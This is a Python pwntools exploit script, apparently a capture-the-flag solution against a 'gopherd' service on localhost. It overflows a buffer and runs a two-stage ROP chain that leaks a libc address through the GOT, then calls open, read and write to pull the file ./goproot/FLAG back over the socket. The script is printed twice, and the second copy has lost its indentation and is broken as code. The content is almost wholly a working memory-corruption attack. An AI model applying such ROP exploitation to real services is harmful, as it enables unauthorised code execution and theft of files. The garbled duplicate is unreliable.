otms61/gopherd.py

## gopherd.py
from pwn import *
from struct import pack, unpack
from time import sleep

# Use own libc_read, libc_open, libc_write and libc_binsh address
libc_read = 0xdb460 # 000db460 <__read>
libc_open = 0xdafd0 # 000dafd0 <__open>
libc_write = 0xdb4e0 # 000db4e0 <__write>
# $ strings -a -t x libc.so.6 | grep "/bin/sh"
#  1612c4 /bin/sh
libc_binsh = 0x1612c4

read_plt = 0x80487c0  # 0x80487c0 <read@plt>
read_got = 0x804c010  # 0x804c010 <read@got.plt>
send_plt = 0x8048a20 # 08048a20 <send@plt>

buf_file = 0x804c1c0  # 0x0804c000 0x0804d000 rw-p

ret = 0x804877f
popret = 0x8048796
pop2ret = 0x8048d93
pop3ret = 0x804926b
pop4ret = 0x804a7dc
leaveret = 0x8048a89

t = remote('localhost', 2233, timeout=1000)

def stage1():
    p1 = ''
    p1 += 'a'*72
    p1 += '938d0408' # pop2ret  0x8048d93
    p1 += 'a'*8
    p1 += '08d00408' # 0x0804d008 hash list address
    p1 += '208a0408' #send(4, read_got, 4, 0) 0x8048a20
    p1 += 'dca70408' #pop4ret
    p1 += '04000000' #4
    p1 += '10c00408' #read_got
    p1 += '04000000' #4
    p1 += '00000000' #0
    p1 += 'c0870408' #read@plt
    p1 += 'dca70408' #pop4ret
    p1 += '04000000' #fd
    p1 += 'c0c70408' #.data
    p1 += '00040000' #size
    p1 += 'c0c70408' #.data
    p1 += '898a0408' #leave, ret;
    p1 += '\r\n' # end
    t.send(p1)

def stage2(open_addr, write_addr):
    p2 = ''
    p2 += pack('<I', 0xdeadbeaf)     # .data
    p2 += pack('<I', read_plt) # read(4, buf_file, 0xff)
    p2 += pack('<I', pop3ret) # pop2ret
    p2 += pack('<I', 4)
    p2 += pack('<I', buf_file)
    p2 += pack('<I', 0xff)
    p2 += pack('<I', open_addr) # open(buf_file, 4)
    p2 += pack('<I', pop2ret) # pop2ret
    p2 += pack('<I', buf_file)
    p2 += pack('<I', 4)
    p2 += pack('<I', read_plt) # read(3, buf_file, 64)
    p2 += pack('<I', pop3ret) # pop2ret
    p2 += pack('<I', 3)
    p2 += pack('<I', buf_file)
    p2 += pack('<I', 64)
    p2 += pack('<I', write_addr) # write(4, buf_file, 64)
    p2 += pack('<I', 0xdeadbeaf)
    p2 += pack('<I', 4)
    p2 += pack('<I', buf_file)
    p2 += pack('<I', 64)
    t.sendline(p2)

def main():
    print "[*] Stage1: send stager ROP"
    stage1()
    sleep(1)

    print "[+] Leak address"
    read_addr = unpack('<I', t.recv(4))[0]
    libc_base = read_addr - libc_read
    binsh_addr = libc_base + libc_binsh
    open_addr = libc_base + libc_open
    write_addr = libc_base + libc_write

    print "  [+] read address: %s" % hex(read_addr)
    print "  [+] open address: %s" % hex(open_addr)
    print "  [+] write address: %s" % hex(write_addr)

    print "[*] Stage2: send ROP"
    stage2(open_addr, write_addr)
    sleep(1)

    print "[*] Stage3: send open File name"
    t.send('./goproot/FLAG')
    print "[+] File contens"
    print t.recv(64)
    t.close()

if __name__ == '__main__':
    main()
	from pwn import *
	from struct import pack, unpack
	from time import sleep

	# Use own libc_read, libc_open, libc_write and libc_binsh address
	libc_read = 0xdb460 # 000db460 <__read>
	libc_open = 0xdafd0 # 000dafd0 <__open>
	libc_write = 0xdb4e0 # 000db4e0 <__write>
	# $ strings -a -t x libc.so.6 \| grep "/bin/sh"
	# 1612c4 /bin/sh
	libc_binsh = 0x1612c4

	read_plt = 0x80487c0 # 0x80487c0 <read@plt>
	read_got = 0x804c010 # 0x804c010 <read@got.plt>
	send_plt = 0x8048a20 # 08048a20 <send@plt>

	buf_file = 0x804c1c0 # 0x0804c000 0x0804d000 rw-p

	ret = 0x804877f
	popret = 0x8048796
	pop2ret = 0x8048d93
	pop3ret = 0x804926b
	pop4ret = 0x804a7dc
	leaveret = 0x8048a89

	t = remote('localhost', 2233, timeout=1000)

	def stage1():
	p1 = ''
	p1 += 'a'*72
	p1 += '938d0408' # pop2ret 0x8048d93
	p1 += 'a'*8
	p1 += '08d00408' # 0x0804d008 hash list address
	p1 += '208a0408' #send(4, read_got, 4, 0) 0x8048a20
	p1 += 'dca70408' #pop4ret
	p1 += '04000000' #4
	p1 += '10c00408' #read_got
	p1 += '04000000' #4
	p1 += '00000000' #0
	p1 += 'c0870408' #read@plt
	p1 += 'dca70408' #pop4ret
	p1 += '04000000' #fd
	p1 += 'c0c70408' #.data
	p1 += '00040000' #size
	p1 += 'c0c70408' #.data
	p1 += '898a0408' #leave, ret;
	p1 += '\r\n' # end
	t.send(p1)

	def stage2(open_addr, write_addr):
	p2 = ''
	p2 += pack('<I', 0xdeadbeaf) # .data
	p2 += pack('<I', read_plt) # read(4, buf_file, 0xff)
	p2 += pack('<I', pop3ret) # pop2ret
	p2 += pack('<I', 4)
	p2 += pack('<I', buf_file)
	p2 += pack('<I', 0xff)
	p2 += pack('<I', open_addr) # open(buf_file, 4)
	p2 += pack('<I', pop2ret) # pop2ret
	p2 += pack('<I', buf_file)
	p2 += pack('<I', 4)
	p2 += pack('<I', read_plt) # read(3, buf_file, 64)
	p2 += pack('<I', pop3ret) # pop2ret
	p2 += pack('<I', 3)
	p2 += pack('<I', buf_file)
	p2 += pack('<I', 64)
	p2 += pack('<I', write_addr) # write(4, buf_file, 64)
	p2 += pack('<I', 0xdeadbeaf)
	p2 += pack('<I', 4)
	p2 += pack('<I', buf_file)
	p2 += pack('<I', 64)
	t.sendline(p2)

	def main():
	print "[*] Stage1: send stager ROP"
	stage1()
	sleep(1)

	print "[+] Leak address"
	read_addr = unpack('<I', t.recv(4))[0]
	libc_base = read_addr - libc_read
	binsh_addr = libc_base + libc_binsh
	open_addr = libc_base + libc_open
	write_addr = libc_base + libc_write

	print " [+] read address: %s" % hex(read_addr)
	print " [+] open address: %s" % hex(open_addr)
	print " [+] write address: %s" % hex(write_addr)

	print "[*] Stage2: send ROP"
	stage2(open_addr, write_addr)
	sleep(1)

	print "[*] Stage3: send open File name"
	t.send('./goproot/FLAG')
	print "[+] File contens"
	print t.recv(64)
	t.close()

	if __name__ == '__main__':
	main()